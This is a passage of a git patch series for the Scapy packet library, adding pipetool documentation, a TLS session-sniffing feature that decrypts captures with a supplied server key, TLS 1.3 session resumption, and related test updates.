packet. + Defaults to True. + :type newlines: bool """ def __init__(self, name=None, newlines=True): @@ -562,7 +590,9 @@ def generate(self): class TermSink(Sink): - """Print messages on low and high entries on a separate terminal: + """ + Prints messages on the low and high entries, on a separate terminal (xterm + or cmd). .. code:: @@ -571,9 +601,21 @@ class TermSink(Sink): | print | >-|--' |-> +-------+ + + :param keepterm: Leave the terminal window open after :py:meth:`~Pipe.stop` + is called. Defaults to True. + :type keepterm: bool + :param newlines: Include a new-line character after printing each packet. + Defaults to True. + :type newlines: bool + :param openearly: Automatically starts the terminal when the constructor is + called, rather than waiting for :py:meth:`~Pipe.start`. + Defaults to True. + :type openearly: bool """ - def __init__(self, name=None, keepterm=True, newlines=True, openearly=True): # noqa: E501 + def __init__(self, name=None, keepterm=True, newlines=True, + openearly=True): Sink.__init__(self, name=name) self.keepterm = keepterm self.newlines = newlines @@ -656,8 +698,10 @@ def high_push(self, msg): class QueueSink(Sink): - """Collect messages from high and low entries and queue them. - Messages are unqueued with the .recv() method: + """ + Collects messages on the low and high entries into a :py:class:`Queue`. + Messages are dequeued with :py:meth:`recv`. + Both high and low entries share the same :py:class:`Queue`. .. code:: @@ -679,6 +723,20 @@ def high_push(self, msg): self.q.put(msg) def recv(self, block=True, timeout=None): + """ + Reads the next message from the queue. + + If no message is available in the queue, returns None. + + :param block: Blocks execution until a packet is available in the + queue. Defaults to True. + :type block: bool + :param timeout: Controls how long to wait if ``block=True``. If None + (the default), this method will wait forever. If a + non-negative number, this is a number of seconds to + wait before giving up (and returning None). + :type timeout: None, int or float + """ try: return self.q.get(block=block, timeout=timeout) except six.moves.queue.Empty: diff --git a/scapy/scapypipes.py b/scapy/scapypipes.py index 9c9c335c94e..166970c1fc7 100644 --- a/scapy/scapypipes.py +++ b/scapy/scapypipes.py @@ -12,8 +12,6 @@ from scapy.config import conf from scapy.compat import raw from scapy.utils import ContextManagerSubprocess, PcapReader, PcapWriter -from scapy.automaton import recv_error -from scapy.consts import WINDOWS class SniffSource(Source): @@ -64,10 +62,11 @@ def check_recv(self): def deliver(self): try: - self._send(self.s.recv()) - except recv_error: - if not WINDOWS: - raise + pkt = self.s.recv() + if pkt is not None: + self._send(pkt) + except EOFError: + self.is_exhausted = True class RdpcapSource(Source): @@ -142,7 +141,15 @@ def start(self): class WrpcapSink(Sink): - """Packets received on low input are written to PCAP file + """ + Writes :py:class:`Packet` on the low entry to a ``pcap`` file. + Ignores all messages on the high entry. + + .. note:: + + Due to limitations of the ``pcap`` format, all packets **must** be of + the same link type. This class will not mutate packets to conform with + the expected link type. .. code:: @@ -151,6 +158,24 @@ class WrpcapSink(Sink): | | >-|--[pcap] |-> +----------+ + + :param fname: Filename to write packets to. + :type fname: str + :param linktype: See :py:attr:`linktype`. + :type linktype: None or int + + .. py:attribute:: linktype + + Set an explicit link-type (``DLT_``) for packets. This must be an + ``int`` or ``None``. + + This is the same as the :py:func:`wrpcap` ``linktype`` parameter. + + If ``None`` (the default), the linktype will be auto-detected on the + first packet. This field will *not* be updated with the result of this + auto-detection. + + This attribute has no effect after calling :py:meth:`PipeEngine.start`. """ def __init__(self, fname, name=None, linktype=None): @@ -173,7 +198,17 @@ def push(self, msg): class WiresharkSink(WrpcapSink): - """Packets received on low input are pushed to Wireshark. + """ + Streams :py:class:`Packet` from the low entry to Wireshark. + + Packets are written into a ``pcap`` stream (like :py:class:`WrpcapSink`), + and streamed to a new Wireshark process on its ``stdin``. + + Wireshark is run with the ``-ki -`` arguments, which cause it to treat + ``stdin`` as a capture device. Arguments in :py:attr:`args` will be + appended after this. + + Extends :py:mod:`WrpcapSink`. .. code:: @@ -182,6 +217,21 @@ class WiresharkSink(WrpcapSink): | | >-|--[pcap] |-> +----------+ + + :param linktype: See :py:attr:`WrpcapSink.linktype`. + :type linktype: None or int + :param args: See :py:attr:`args`. + :type args: None or list[str] + + .. py:attribute:: args + + Additional arguments for the Wireshark process. + + This must be either ``None`` (the default), or a ``list`` of ``str``. + + This attribute has no effect after calling :py:meth:`PipeEngine.start`. + + See :manpage:`wireshark(1)` for more details. """ def __init__(self, name=None, linktype=None, args=None): @@ -192,7 +242,7 @@ def start(self): # Wireshark must be running first, because PcapWriter will block until # data has been read! with ContextManagerSubprocess(conf.prog.wireshark): - args = [conf.prog.wireshark, "-ki", "-"] + args = [conf.prog.wireshark, "-Slki", "-"] if self.args: args.extend(self.args) diff --git a/scapy/utils.py b/scapy/utils.py index 3149e005934..d13fb1bb58c 100644 --- a/scapy/utils.py +++ b/scapy/utils.py @@ -687,10 +687,7 @@ def do_graph(graph, prog=None, format=None, target=None, type=None, """ if format is None: - if WINDOWS: - format = "png" # use common format to make sure a viewer is installed # noqa: E501 - else: - format = "svg" + format = "svg" if string: return graph if type is not None: @@ -717,11 +714,17 @@ def do_graph(graph, prog=None, format=None, target=None, type=None, target = open(target[1:].lstrip(), "wb") else: target = open(os.path.abspath(target), "wb") - proc = subprocess.Popen("\"%s\" %s %s" % (prog, options or "", format or ""), # noqa: E501 - shell=True, stdin=subprocess.PIPE, stdout=target) - proc.stdin.write(bytes_encode(graph)) - proc.stdin.close() - proc.wait() + proc = subprocess.Popen( + "\"%s\" %s %s" % (prog, options or "", format or ""), + shell=True, stdin=subprocess.PIPE, stdout=target, + stderr=subprocess.PIPE + ) + _, stderr = proc.communicate(bytes_encode(graph)) + if proc.returncode != 0: + raise OSError( + "GraphViz call failed (is it installed?):\n" + + plain_str(stderr) + ) try: target.close() except Exception: diff --git a/test/pipetool.uts b/test/pipetool.uts index bd40fb89b47..9a764e76e29 100644 --- a/test/pipetool.uts +++ b/test/pipetool.uts @@ -337,7 +337,7 @@ with mock.patch("scapy.scapypipes.subprocess.Popen", return_value=Bunch(stdin=f) p.wait_and_stop() popen.assert_called_once_with( - [conf.prog.wireshark, '-ki', '-'], stdin=subprocess.PIPE, stdout=None, + [conf.prog.wireshark, '-Slki', '-'], stdin=subprocess.PIPE, stdout=None, stderr=None) bytes_hex(f.getvalue()) bytes_hex(raw(pkt)) @@ -362,7 +362,7 @@ with mock.patch("scapy.scapypipes.subprocess.Popen", return_value=Bunch(stdin=f) p.wait_and_stop() popen.assert_called_once_with( - [conf.prog.wireshark, '-ki', '-'], + [conf.prog.wireshark, '-Slki', '-'], stdin=subprocess.PIPE, stdout=None, stderr=None) bytes_hex(f.getvalue()) @@ -392,7 +392,7 @@ with mock.patch("scapy.scapypipes.subprocess.Popen", return_value=Bunch(stdin=f) p.wait_and_stop() popen.assert_called_once_with( - [conf.prog.wireshark, '-ki', '-', '-c', '1'], + [conf.prog.wireshark, '-Slki', '-', '-c', '1'], stdin=subprocess.PIPE, stdout=None, stderr=None) = Test RdpcapSource and WrpcapSink @@ -713,7 +713,7 @@ p.add(s) p.start() from scapy.layers.http import HTTPRequest, HTTP -s.send(bytes(HTTPRequest(Host="www.google.com"))) +s.send(bytes(HTTP()/HTTPRequest(Host="www.google.com"))) result = c.q.get(timeout=10) p.stop() From 579c12b049dc7ee15168693ad0cca742cff76aaa Mon Sep 17 00:00:00 2001 From: gpotter Date: Tue, 28 Apr 2020 15:00:39 +0200 Subject: [PATCH 0125/1632] Tests & wording improvements --- doc/scapy/advanced_usage.rst | 22 +++++++++++----------- test/pipetool.uts | 16 +++++++++++----- 2 files changed, 22 insertions(+), 16 deletions(-) diff --git a/doc/scapy/advanced_usage.rst b/doc/scapy/advanced_usage.rst index 4609adbbbb3..d06785c724a 100644 --- a/doc/scapy/advanced_usage.rst +++ b/doc/scapy/advanced_usage.rst @@ -795,11 +795,11 @@ Two methods are hooks to be overloaded: PipeTools ========= -Pipetool is a smart piping system allowing to perform complex stream data management. There are various differences between PipeTools and Automatons: +Scapy's ``pipetool`` is a smart piping system allowing to perform complex stream data management. -- PipeTools have no states: data is always sent following the same pattern -- PipeTools are not based on sockets but can handle more varied sources of data (and outputs) such as user input, pcap input (but also sniffing) -- PipeTools are not class-based, but rather implemented by manually linking all their parts. That has drawbacks but allows to dynamically add a Source, Drain while running, and set multiple drains for the same source +The goal is to create a sequence of steps with one or several inputs and one or several outputs, with a bunch of blocks in between. +PipeTools can handle varied sources of data (and outputs) such as user input, pcap input, sniffing, wireshark... +A pipe system is implemented by manually linking all its parts. It is possible to dynamically add an element while running or set multiple drains for the same source. .. note:: Pipetool default objects are located inside ``scapy.pipetool`` @@ -846,7 +846,7 @@ They are executed and handled by a :class:`~scapy.pipetool.PipeEngine` object. When running, a pipetool engine waits for any available data from the Source, and send it in the Drains linked to it. The data then goes from Drains to Drains until it arrives in a Sink, the final state of this data. -Here is a basic demo of what the PipeTool system can do +Let's see with a basic demo how to build a pipetool system. .. image:: graphics/pipetool_engine.png @@ -874,13 +874,13 @@ For instance, this engine was generated with this code: >>> p.add(s2) >>> p.graph(target="> the_above_image.png") -Let's start our PipeEngine: +``start()`` is used to start the :class:`~scapy.pipetool.PipeEngine`: .. code:: pycon >>> p.start() -Now, let's play with it: +Now, let's play with it by sending some input data .. code:: pycon @@ -895,10 +895,10 @@ Now, let's play with it: Let's study what happens here: -- there are two canals in a PipeEngine, a lower one and a higher one. Some Sources write on the lower one, some on the higher one and some on both. -- most sources can be linked to any drain, on both lower and higher canals. The use of `>` indicates a link on the low canal, and `>>` on the higher one. -- when we send some data in `s`, which is on the lower canal, as shown above, it goes through the `Drain` then is sent to the `QueueSink` and to the `ConsoleSink` -- when we send some data in `s2`, it goes through the Drain, then the TransformDrain where the data is reversed (see the lambda), before being sent to `ConsoleSink` only. This explains why we only have the data of the lower sources inside the QueueSink: the higher one has not been linked. +- there are **two canals** in a :class:`~scapy.pipetool.PipeEngine`, a lower one and a higher one. Some Sources write on the lower one, some on the higher one and some on both. +- most sources can be linked to any drain, on both lower and higher canals. The use of ``>`` indicates a link on the low canal, and ``>>`` on the higher one. +- when we send some data in ``s``, which is on the lower canal, as shown above, it goes through the :class:`~scapy.pipetool.Drain` then is sent to the :class:`~.scapy.pipetool.QueueSink` and to the :class:`~scapy.pipetool.ConsoleSink` +- when we send some data in ``s2``, it goes through the Drain, then the TransformDrain where the data is reversed (see the lambda), before being sent to :class:`~scapy.pipetool.ConsoleSink` only. This explains why we only have the data of the lower sources inside the QueueSink: the higher one has not been linked. Most of the sinks receive from both lower and upper canals. This is verifiable using the `help(ConsoleSink)` diff --git a/test/pipetool.uts b/test/pipetool.uts index 9a764e76e29..5b72078b04e 100644 --- a/test/pipetool.uts +++ b/test/pipetool.uts @@ -322,7 +322,7 @@ except: from io import BytesIO f = BytesIO() -pkt = Ether()/IP()/ICMP() +pkt = Ether(src="aa:aa:aa:aa:aa:aa", dst="aa:aa:aa:aa:aa:aa")/IP(src="127.0.0.1", dst="127.0.0.1")/ICMP() with mock.patch("scapy.scapypipes.subprocess.Popen", return_value=Bunch(stdin=f)) as popen: p = PipeEngine() @@ -339,6 +339,7 @@ with mock.patch("scapy.scapypipes.subprocess.Popen", return_value=Bunch(stdin=f) popen.assert_called_once_with( [conf.prog.wireshark, '-Slki', '-'], stdin=subprocess.PIPE, stdout=None, stderr=None) + bytes_hex(f.getvalue()) bytes_hex(raw(pkt)) assert raw(pkt) in f.getvalue() @@ -346,7 +347,7 @@ assert raw(pkt) in f.getvalue() = Test WiresharkSink with linktype f = BytesIO() -pkt = Ether()/IP()/ICMP() +pkt = Ether(src="aa:aa:aa:aa:aa:aa", dst="aa:aa:aa:aa:aa:aa")/IP(src="127.0.0.1", dst="127.0.0.1")/ICMP() linktype = scapy.data.DLT_EN3MB with mock.patch("scapy.scapypipes.subprocess.Popen", return_value=Bunch(stdin=f)) as popen: @@ -373,11 +374,12 @@ assert raw(pkt) in f.getvalue() f.seek(0) or None r = PcapReader(f) assert r.linktype == DLT_EN3MB +r.close() = Test WiresharkSink with args f = BytesIO() -pkt = Ether()/IP()/ICMP() +pkt = Ether(src="aa:aa:aa:aa:aa:aa", dst="aa:aa:aa:aa:aa:aa")/IP(src="127.0.0.1", dst="127.0.0.1")/ICMP() with mock.patch("scapy.scapypipes.subprocess.Popen", return_value=Bunch(stdin=f)) as popen: p = PipeEngine() @@ -395,12 +397,16 @@ popen.assert_called_once_with( [conf.prog.wireshark, '-Slki', '-', '-c', '1'], stdin=subprocess.PIPE, stdout=None, stderr=None) +bytes_hex(f.getvalue()) +bytes_hex(raw(pkt)) +assert raw(pkt) in f.getvalue() + = Test RdpcapSource and WrpcapSink dname = get_temp_dir() -req = Ether()/IP()/ICMP() -rpy = Ether()/IP(b'E\x00\x00\x1c\x00\x00\x00\x004\x01\x1d\x04\xd8:\xd0\x83\xc0\xa8\x00w\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00') +req = Ether(b'E\x00\x00\x1c\x00\x00\x00\x004\x01\x1d\x04\xd8:\xd0\x83\xc0\xa8\x00w\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00') +rpy = Ether(b'\x8c\xf8\x13C5P\xdcS`\xeb\x80H\x08\x00E\x00\x00\x1c\x00\x00\x00\x004\x01\x1d\x04\xd8:\xd0\x83\xc0\xa8\x00w\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00') wrpcap(os.path.join(dname, "t.pcap"), [req, rpy]) From 4d9211804fb7aea3891f4da5536d38a6e72cc161 Mon Sep 17 00:00:00 2001 From: gpotter Date: Sat, 2 May 2020 21:59:10 +0200 Subject: [PATCH 0126/1632] Close ObjectPipes properly --- scapy/automaton.py | 3 +++ 1 file changed, 3 insertions(+) diff --git a/scapy/automaton.py b/scapy/automaton.py index be1e6fdbee1..749c2ee6c44 100644 --- a/scapy/automaton.py +++ b/scapy/automaton.py @@ -237,6 +237,9 @@ def close(self): os.close(self.wr) self.queue.clear() + def __del__(self): + self.close() + @staticmethod def select(sockets, remain=conf.recv_poll_rate): # Only handle ObjectPipes From b59c0ce5fb9bedb39e3bc9bb2bcd7540ddadaa44 Mon Sep 17 00:00:00 2001 From: gpotter Date: Sun, 19 Apr 2020 17:19:33 +0200 Subject: [PATCH 0127/1632] Sniffing with TLS sessions --- doc/scapy/usage.rst | 1 + scapy/layers/tls/record.py | 43 +++++++++++++++++++--- scapy/layers/tls/session.py | 62 ++++++++++++++++++++++++++++---- test/tls.uts | 26 ++++++++++++-- test/tls/tests_tls_netaccess.uts | 2 +- test/tls13.uts | 2 ++ 6 files changed, 121 insertions(+), 15 deletions(-) diff --git a/doc/scapy/usage.rst b/doc/scapy/usage.rst index 40b5492b04f..53030e8180c 100644 --- a/doc/scapy/usage.rst +++ b/doc/scapy/usage.rst @@ -760,6 +760,7 @@ Available by default: - ``IPSession`` -> *defragment IP packets* on-the-flow, to make a stream usable by ``prn``. - ``TCPSession`` -> *defragment certain TCP protocols**. Only **HTTP 1.0** currently uses this functionality. +- ``TLSSession`` -> *matches TLS sessions* on the flow. - ``NetflowSession`` -> *resolve Netflow V9 packets* from their NetflowFlowset information objects Those sessions can be used using the ``session=`` parameter of ``sniff()``. Examples:: diff --git a/scapy/layers/tls/record.py b/scapy/layers/tls/record.py index d258a7dc270..497c827b10d 100644 --- a/scapy/layers/tls/record.py +++ b/scapy/layers/tls/record.py @@ -52,7 +52,7 @@ def _tls_version_check(version, min): ############################################################################### -class _TLSEncryptedContent(Raw): +class _TLSEncryptedContent(Raw, _GenericTLSSessionInheritance): """ When the content of a TLS record (more precisely, a TLSCiphertext) could not be deciphered, we use this class to represent the encrypted data. @@ -61,6 +61,12 @@ class _TLSEncryptedContent(Raw): version), the nonce_explicit, IV and/or padding will also be parsed. """ name = "Encrypted Content" + match_subclass = True + + def mysummary(self): + s = _GenericTLSSessionInheritance.mysummary(self) + s += " / " + self.name + return s class _TLSMsgListField(PacketListField): @@ -217,6 +223,16 @@ def addfield(self, pkt, s, val): return hdr + res +def _ssl_looks_like_sslv2(dat): + """ + This is a copycat of wireshark's `packet-tls.c` ssl_looks_like_sslv2 + """ + if len(dat) < 3: + return + from scapy.layers.tls.handshake_sslv2 import _sslv2_handshake_type + return ord(dat[:1]) >= 0x80 and ord(dat[2:3]) in _sslv2_handshake_type + + class TLS(_GenericTLSSessionInheritance): """ The generic TLS Record message, based on section 6.2 of RFC 5246. @@ -301,10 +317,20 @@ def dispatch_hook(cls, _pkt=None, *args, **kargs): plen = len(_pkt) if plen >= 2: byte0, byte1 = struct.unpack("BB", _pkt[:2]) - if (byte0 not in _tls_type) or (byte1 != 3): - from scapy.layers.tls.record_sslv2 import SSLv2 - return SSLv2 s = kargs.get("tls_session", None) + if byte0 not in _tls_type or byte1 != 3: # Unknown type + # Check SSLv2: either the session is already SSLv2, + # either the packet looks like one. As said above, this + # isn't 100% reliable, but Wireshark does the same + if s and (s.tls_version == 0x0002 or + s.advertised_tls_version == 0x0002) or \ + (_ssl_looks_like_sslv2(_pkt) and (not s or + s.tls_version is None)): + from scapy.layers.tls.record_sslv2 import SSLv2 + return SSLv2 + # Not SSLv2: continuation + return _TLSEncryptedContent + # Check TLS 1.3 if s and _tls_version_check(s.tls_version, 0x0304): if s.rcs and not isinstance(s.rcs.cipher, Cipher_NULL): from scapy.layers.tls.record_tls13 import TLS13 @@ -312,7 +338,7 @@ def dispatch_hook(cls, _pkt=None, *args, **kargs): if plen < 5: # Layer detected as TLS but too small to be a # parsed. Scapy should not try to decode them - return conf.raw_layer + return _TLSEncryptedContent return TLS # Parsing methods @@ -691,11 +717,18 @@ def post_build(self, pkt, pay): return hdr + efrag + pay + def mysummary(self): + s = super(TLS, self).mysummary() + if self.msg: + s += " / " + s += " / ".join(x.name for x in self.msg) + return s ############################################################################### # TLS ChangeCipherSpec # ############################################################################### + _tls_changecipherspec_type = {1: "change_cipher_spec"} diff --git a/scapy/layers/tls/session.py b/scapy/layers/tls/session.py index 24b2d111b8a..4fb5f20fe68 100644 --- a/scapy/layers/tls/session.py +++ b/scapy/layers/tls/session.py @@ -15,7 +15,10 @@ import scapy.modules.six as six from scapy.error import log_runtime, warning from scapy.packet import Packet +from scapy.pton_ntop import inet_pton +from scapy.sessions import DefaultSession from scapy.utils import repr_hex, strxor +from scapy.layers.inet import TCP from scapy.layers.tls.crypto.compression import Comp_NULL from scapy.layers.tls.crypto.hkdf import TLS13_HKDF from scapy.layers.tls.crypto.prf import PRF @@ -802,8 +805,8 @@ def hash(self): family = socket.AF_INET if ':' in self.ipsrc: family = socket.AF_INET6 - s1 += socket.inet_pton(family, self.ipsrc) - s2 += socket.inet_pton(family, self.ipdst) + s1 += inet_pton(family, self.ipsrc) + s2 += inet_pton(family, self.ipdst) return strxor(s1, s2) def eq(self, other): @@ -855,8 +858,10 @@ def __init__(self, _pkt="", post_transform=None, _internal=0, except Exception: setme = True + newses = False if setme: if tls_session is None: + newses = True self.tls_session = tlsSession() else: self.tls_session = tls_session @@ -864,6 +869,31 @@ def __init__(self, _pkt="", post_transform=None, _internal=0, self.rcs_snap_init = self.tls_session.rcs.snapshot() self.wcs_snap_init = self.tls_session.wcs.snapshot() + if isinstance(_underlayer, TCP): + tcp = _underlayer + self.tls_session.sport = tcp.sport + self.tls_session.dport = tcp.dport + try: + self.tls_session.ipsrc = tcp.underlayer.src + self.tls_session.ipdst = tcp.underlayer.dst + except AttributeError: + pass + if conf.tls_session_enable: + if newses: + s = conf.tls_sessions.find(self.tls_session) + if s: + if s.dport == self.tls_session.dport: + self.tls_session = s + else: + self.tls_session = s.mirror() + else: + conf.tls_sessions.add(self.tls_session) + if self.tls_session.connection_end == "server": + srk = conf.tls_sessions.server_rsa_key + if not self.tls_session.server_rsa_key and \ + srk: + self.tls_session.server_rsa_key = srk + Packet.__init__(self, _pkt=_pkt, post_transform=post_transform, _internal=_internal, _underlayer=_underlayer, **fields) @@ -963,9 +993,8 @@ def show2(self): s.rcs = rcs_snap s.wcs = wcs_snap - # Uncomment this when the automata update IPs and ports properly - # def mysummary(self): - # return "TLS %s" % repr(self.tls_session) + def mysummary(self): + return "TLS %s" % repr(self.tls_session) ############################################################################### @@ -975,6 +1004,7 @@ def show2(self): class _tls_sessions(object): def __init__(self): self.sessions = {} + self.server_rsa_key = None def add(self, session): s = self.find(session) @@ -998,7 +1028,10 @@ def rem(self, session): self.sessions[h].remove(session) def find(self, session): - h = session.hash() + try: + h = session.hash() + except Exception: + return None if h in self.sessions: for k in self.sessions[h]: if k.eq(session): @@ -1019,10 +1052,25 @@ def __repr__(self): if len(sid) > 12: sid = sid[:11] + "..." res.append((src, dst, sid)) - colwidth = (max([len(y) for y in x]) for x in zip(*res)) + colwidth = (max(len(y) for y in x) for x in zip(*res)) fmt = " ".join(map(lambda x: "%%-%ds" % x, colwidth)) return "\n".join(map(lambda x: fmt % x, res)) +class TLSSession(DefaultSession): + def __init__(self, *args, **kwargs): + server_rsa_key = kwargs.pop("server_rsa_key", None) + super(TLSSession, self).__init__(*args, **kwargs) + self._old_conf_status = conf.tls_session_enable + conf.tls_session_enable = True + if server_rsa_key: + conf.tls_sessions.server_rsa_key = server_rsa_key + + def toPacketList(self): + conf.tls_session_enable = self._old_conf_status + return super(TLSSession, self).toPacketList() + + conf.tls_sessions = _tls_sessions() +conf.tls_session_enable = False conf.tls_verbose = False diff --git a/test/tls.uts b/test/tls.uts index 54070a8eb27..7362700ecb9 100644 --- a/test/tls.uts +++ b/test/tls.uts @@ -1061,8 +1061,11 @@ assert (t6.payload.payload.mac == b'\x10\xce\xca2\xb4\xc3m\xf1\x16c\xdb\xfc\x08\ # suite does not provide PFS, we are able to break the data confidentiality. + Read a vulnerable TLS session +~ server_rsa_key = Reading TLS vulnerable session - Decrypt data from using a compromised server key +load_layer("tls") + from scapy.layers.tls.cert import PrivKeyRSA from scapy.layers.tls.record import TLSApplicationData import os @@ -1084,7 +1087,26 @@ t = TLS(data, tls_session=t.tls_session.mirror()) assert(len(t.msg) == 1) assert(isinstance(t.msg[0], TLSApplicationData)) assert(t.msg[0].data == b"") -t.getlayer(2).msg[0].data == b"To boldly go where no man has gone before...\n" +t.getlayer(TLS, 2).msg[0].data == b"To boldly go where no man has gone before...\n" + += Auto provide the session + +conf.debug_dissector = 2 +client = "192.168.0.1" +server = "1.2.3.4" +bc = Ether()/IP(src=client, dst=server)/TCP(sport=51478, dport=443, seq=1) +bs = Ether()/IP(src=server, dst=client)/TCP(sport=443, dport=51478, seq=1) +pcap = [ + bc/ch, + bs/sh, + bc/ck, + bs/fin, + bc/data +] +res = sniff(offline=pcap, session=TLSSession(server_rsa_key=key)) + +res[4].show() +assert res[4].getlayer(TLS, 2).msg[0].data == b"To boldly go where no man has gone before...\n" ############################################################################### @@ -1165,7 +1187,7 @@ raw(t) == b'\xde\xad\xbe\xef\xff\x01' = Building packets - TLS record with bad data a = TLS(b'\x17\x03\x03\x00\x03data') -assert a.haslayer(Raw) +assert a[Raw] = Building packets - _CipherSuitesField with no cipher diff --git a/test/tls/tests_tls_netaccess.uts b/test/tls/tests_tls_netaccess.uts index ad88b5c77d8..99165810371 100644 --- a/test/tls/tests_tls_netaccess.uts +++ b/test/tls/tests_tls_netaccess.uts @@ -32,7 +32,7 @@ from scapy.layers.tls.automaton_srv import TLSServerAutomaton conf.verb = 4 conf.debug_tls = True -conf.debug_dissector = True +conf.debug_dissector = 2 load_layer("tls") @contextmanager diff --git a/test/tls13.uts b/test/tls13.uts index 761ad6af4e4..0c12b098d45 100644 --- a/test/tls13.uts +++ b/test/tls13.uts @@ -622,6 +622,8 @@ assert(m.data == payload) = TLS_Ext_EncryptedServerName(), dissect ~ crypto_advanced +from scapy.layers.tls.extensions import TLS_Ext_EncryptedServerName + clientHello3 = clean(""" 16030102c4010002c003034b1 40e7d15fc8db422cec056fbaf 0285d306df4eedad1bc6ea57d 5114e6bd52a20a5b9c7445955 e296b886469c974648cda0a68 5d3c06d884e388f6475c32e03 2d0024130113031302c02bc02 fcca9cca8c02cc030c00ac009 c013c01400330039002f00350 00a0100025300170000ff0100 From 3c99f399c8408bbaaa32b7f3cd4ca546c5811a31 Mon Sep 17 00:00:00 2001 From: gpotter Date: Sun, 19 Apr 2020 19:07:44 +0200 Subject: [PATCH 0128/1632] Avoid deadlock --- scapy/layers/tls/automaton.py | 2 ++ 1 file changed, 2 insertions(+) diff --git a/scapy/layers/tls/automaton.py b/scapy/layers/tls/automaton.py index 3b951fe42ee..3a3617c2512 100644 --- a/scapy/layers/tls/automaton.py +++ b/scapy/layers/tls/automaton.py @@ -180,6 +180,8 @@ def get_next_msg(self, socket_timeout=2, retry=2): self.buffer_in += p.msg else: self.buffer_in += p.inner.msg + else: + p = p.payload def raise_on_packet(self, pkt_cls, state, get_next_msg=True): """ From 5e40de3ee25a453e1011df0714419937eb4c53f0 Mon Sep 17 00:00:00 2001 From: rperez Date: Thu, 5 Sep 2019 16:11:44 +0200 Subject: [PATCH 0129/1632] Add session resumption functionalities --- scapy/layers/tls/automaton_cli.py | 185 ++++++++++++++++++++++++++--- scapy/layers/tls/automaton_srv.py | 189 +++++++++++++++++++++++++++++- scapy/layers/tls/extensions.py | 7 +- scapy/layers/tls/handshake.py | 23 +++- test/tls/example_client.py | 9 ++ test/tls/example_server.py | 3 + 6 files changed, 390 insertions(+), 26 deletions(-) diff --git a/scapy/layers/tls/automaton_cli.py b/scapy/layers/tls/automaton_cli.py index 8c3ada4eb0c..07c240a4702 100644 --- a/scapy/layers/tls/automaton_cli.py +++ b/scapy/layers/tls/automaton_cli.py @@ -20,11 +20,14 @@ from __future__ import print_function import socket import binascii +import struct +import time from scapy.config import conf from scapy.pton_ntop import inet_pton from scapy.utils import randstring, repr_hex from scapy.automaton import ATMT +from scapy.error import warning from scapy.layers.tls.automaton import _TLSAutomaton from scapy.layers.tls.basefields import _tls_version, _tls_version_options from scapy.layers.tls.session import tlsSession @@ -36,7 +39,7 @@ TLSEncryptedExtensions, TLSFinished, TLSServerHello, TLSServerHelloDone, \ TLSServerKeyExchange, TLS13Certificate, TLS13ClientHello, \ TLS13ServerHello, TLS13HelloRetryRequest, TLS13CertificateRequest, \ - _ASN1CertAndExt, TLS13KeyUpdate + _ASN1CertAndExt, TLS13KeyUpdate, TLS13NewSessionTicket from scapy.layers.tls.handshake_sslv2 import SSLv2ClientHello, \ SSLv2ServerHello, SSLv2ClientMasterKey, SSLv2ServerVerify, \ SSLv2ClientFinished, SSLv2ServerFinished, SSLv2ClientCertificate, \ @@ -46,7 +49,8 @@ TLS_Ext_PreSharedKey_CH from scapy.layers.tls.record import TLSAlert, TLSChangeCipherSpec, \ TLSApplicationData -from scapy.layers.tls.crypto.suites import _tls_cipher_suites +from scapy.layers.tls.crypto.suites import _tls_cipher_suites, \ + _tls_cipher_suites_cls from scapy.layers.tls.crypto.groups import _tls_named_groups from scapy.layers.tls.crypto.hkdf import TLS13_HKDF from scapy.modules import six @@ -76,6 +80,9 @@ class TLSClientAutomaton(_TLSAutomaton): def parse_args(self, server="127.0.0.1", dport=4433, server_name=None, mycert=None, mykey=None, client_hello=None, version=None, + resumption_master_secret=None, + session_ticket_file_in=None, + session_ticket_file_out=None, psk=None, psk_mode=None, data=None, ciphersuite=None, @@ -142,6 +149,9 @@ def parse_args(self, server="127.0.0.1", dport=4433, server_name=None, else: # Or secp256r1 otherwise self.curve = 23 + self.resumption_master_secret = resumption_master_secret + self.session_ticket_file_in = session_ticket_file_in + self.session_ticket_file_out = session_ticket_file_out self.tls13_psk_secret = psk self.tls13_psk_mode = psk_mode if curve is not None: @@ -167,6 +177,10 @@ def vprint_sessioninfo(self): self.vprint("Master secret : %s" % repr_hex(ms)) if s.server_certs: self.vprint("Server certificate chain: %r" % s.server_certs) + if s.tls_version >= 0x0304: + res_secret = s.tls13_derived_secrets["resumption_secret"] + self.vprint("Resumption master secret : %s" % + repr_hex(res_secret)) self.vprint() @ATMT.state(initial=True) @@ -188,8 +202,49 @@ def INIT_TLS_SESSION(self): self.advertised_tls_version = default_version if s.advertised_tls_version >= 0x0304: + # For out of band PSK, the PSK is given as argument + # to the automaton if self.tls13_psk_secret: s.tls13_psk_secret = binascii.unhexlify(self.tls13_psk_secret) + + # For resumed PSK, the PSK is computed from + if self.session_ticket_file_in: + with open(self.session_ticket_file_in, 'rb') as f: + + resumed_ciphersuite_len = struct.unpack("B", f.read(1))[0] + s.tls13_ticket_ciphersuite = \ + struct.unpack("!H", f.read(resumed_ciphersuite_len))[0] + + ticket_nonce_len = struct.unpack("B", f.read(1))[0] + # XXX add client_session_nonce member in tlsSession + s.client_session_nonce = f.read(ticket_nonce_len) + + client_ticket_age_len = struct.unpack("!H", f.read(2))[0] + tmp = f.read(client_ticket_age_len) + s.client_ticket_age = struct.unpack("!I", tmp)[0] + + client_ticket_age_add_len = struct.unpack("!H", f.read(2))[0] # noqa: E501 + tmp = f.read(client_ticket_age_add_len) + s.client_session_ticket_age_add = struct.unpack("!I", tmp)[0] # noqa: E501 + + ticket_len = struct.unpack("!H", f.read(2))[0] + s.client_session_ticket = f.read(ticket_len) + + if self.resumption_master_secret: + + if s.tls13_ticket_ciphersuite not in _tls_cipher_suites_cls: # noqa: E501 + warning("Unknown cipher suite %d" % s.tls13_ticket_ciphersuite) # noqa: E501 + # we do not try to set a default nor stop the execution + else: + cs_cls = _tls_cipher_suites_cls[s.tls13_ticket_ciphersuite] # noqa: E501 + + hkdf = TLS13_HKDF(cs_cls.hash_alg.name.lower()) + hash_len = hkdf.hash.digest_size + + s.tls13_psk_secret = hkdf.expand_label(binascii.unhexlify(self.resumption_master_secret), # noqa: E501 + b"resumption", + s.client_session_nonce, # noqa: E501 + hash_len) raise self.CONNECT() @ATMT.state() @@ 